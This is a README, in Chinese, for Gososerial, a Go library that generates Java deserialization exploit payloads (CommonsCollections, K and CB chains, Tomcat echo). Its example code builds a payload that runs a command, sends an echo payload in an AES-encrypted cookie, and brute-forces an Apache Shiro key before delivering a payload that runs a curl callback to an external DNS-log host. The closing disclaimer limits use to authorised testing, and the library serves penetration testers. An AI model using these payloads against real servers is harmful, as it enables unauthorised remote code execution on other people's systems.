Golang的ysoserial库,提供简单的API生成反序列化Payload。支持CC1-CC7,K1-K4和CB1链,支持Tomcat回显Payload生成
参考著名安全工具xray的代码
ysoserial是java反序列化安全方面著名的工具
从二进制层面解析,无需java环境,无需下载ysoserial.jar
输入命令直接获得payload,方便编写安全工具
目前已支持CC1-CC7,K1-K4和CB1链
支持K1和K2的TomcatEcho,HTTP头可自行取名
go get github.com/4ra1n/Gososerial
package main
import (
"fmt"
gososerial "github.com/4ra1n/Gososerial"
)
func main() {
var payload []byte
payload = gososerial.GetCC1("calc.exe")
fmt.Println(payload)
}
package main
import (
gososerial "github.com/4ra1n/Gososerial"
"..."
)
func main() {
// Testecho: expr 10 '*' 10 -> Testecho: expr 10 '*' 10
// Testcmd: expr 10 '*' 10 -> Testcmd: 100
payload := gososerial.GetCCK2TomcatEcho("Testecho", "Testcmd")
req.Cookie = AESEncrypt(payload)
req.Header["Testecho"] = "gososerial"
req.Method = "POST"
resp := httputil.sendRequest(req)
if resp.Header["Testecho"] == "gososerial" {
log.Info("find cck2 tomcat echo")
}
}
package main
import (
gososerial "github.com/4ra1n/Gososerial"
"..."
)
func main() {
// Shiro Scan Code
target := "http://shiro_ip/"
// Brust Shiro AES Key
key := shiro.CheckShiroKey(target)
if key != nil {
log.Info("find key: %s", key)
}
// Use CommonsCollections5 Payload
var payload []byte
payload = gososerial.GetCC5("curl xxxxx.ceye.io")
// Send Cookies Encrypted By AES
shiro.SendPayload(key, payload, target)
// Receive Results Using Dnslog API
if ceye.CheckResult("your_ceye_token") {
log.Info("find shiro!")
}
}
注意:测试打印false
说明正常,并不是错误,因为我对类名等信息进行随机
参考xray作者phith0n和koalr师傅的代码
未经授权许可使用Gososerial攻击目标是非法的
本程序应仅用于授权的安全测试与研究目的